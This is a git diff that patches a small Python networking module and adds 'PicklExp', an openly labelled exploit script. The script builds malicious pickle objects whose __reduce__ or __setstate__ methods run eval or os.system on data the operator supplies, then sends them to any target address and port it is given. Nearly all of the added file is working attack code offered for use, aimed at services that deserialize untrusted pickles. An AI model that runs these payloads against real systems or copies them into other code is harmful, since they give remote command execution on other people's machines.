diff --git a/networker.py b/networker.py index 674dba5..8c2f4c7 100644 --- a/networker.py +++ b/networker.py @@ -100,14 +100,19 @@ class Connection: threads = dict() actives = dict() def __init__(self, binder, translator, onconn, onrecv, onend): - self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.socket.bind(binder) - self.socket.listen(8) + if binder != None: + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.bind(binder) + self.socket.listen(8) + else: + self.socket = None self.translator = translator self.onconn = onconn self.onrecv = onrecv self.onend = onend def listener(self): + if self.socket == None: + return while self.active: s, a = self.socket.accept() ac = a[0] + ":" + str(a[1]) @@ -193,7 +198,7 @@ class Connection: break time.sleep(0.0001) self.threads.clear() - self.socket.close() + if self.socket != None: self.socket.close() def addresses(self): if self.active: diff --git a/picklexp.py b/picklexp.py new file mode 100644 index 0000000..a3a07a8 --- /dev/null +++ b/picklexp.py @@ -0,0 +1,95 @@ +#BSD 3-Clause, (C) Alfred Manville 2022 +#Be RESPONSIBLE when using this! +import networker as net +import pickle +import traceback +import sys + +#Payloads: +#State payloads only work if the Object is available at the target + +class StatePXP: + def __init__(self, data): + self.data = data + def __getstate__(self): + return self.data + def __setstate__(self, state): + self.data = state + print(self.data) + +class ReducePXP: + def __init__(self, data): + self.data = data + def __reduce__(self): + return print, (self.data,) + +class StateEXP: + def __init__(self, data): + self.data = data + def __getstate__(self): + return self.data + def __setstate__(self, state): + self.data = state + eval(self.data) + +class ReduceEXP: + def __init__(self, data): + self.data = data + def __reduce__(self): + return eval, (self.data,) + +class ReduceSXP: + def __init__(self, data): + self.data = data + def __reduce__(self): + import os + return os.system, (self.data,) + +payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP("")) +payload = None +taddr = "" +tport = 0 +plid = 0 +pldata = "" + +def onx(a): + pass + +def ony(a, m): + pass + +def main(): + conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx) + print("Running Exploit @ " + taddr + ":" + str(tport)) + print("Exploit: " + str(type(payload)) + " ; Data: " + pldata) + try: + conn.connect((taddr, tport)) + print("Exploiting...") + conn.send(taddr+":"+str(tport), payload) + print("Exploited!") + except: + print(traceback.format_exc()) + conn.close() + exit + +if __name__ == "__main__": + print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause") + if len(sys.argv) > 1: + taddr = sys.argv[1] + else: + taddr = input("Enter the target address: ") + if len(sys.argv) > 2: + tport = int(sys.argv[2]) + else: + tport = int(input("Enter the target port: ")) + if len(sys.argv) > 3: + plid = int(sys.argv[3]) - 1 + else: + plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1 + if len(sys.argv) > 4: + pldata = sys.argv[4] + else: + pldata = input("Enter the payload data: ") + payload = payloads[plid] + payload.data = pldata + main()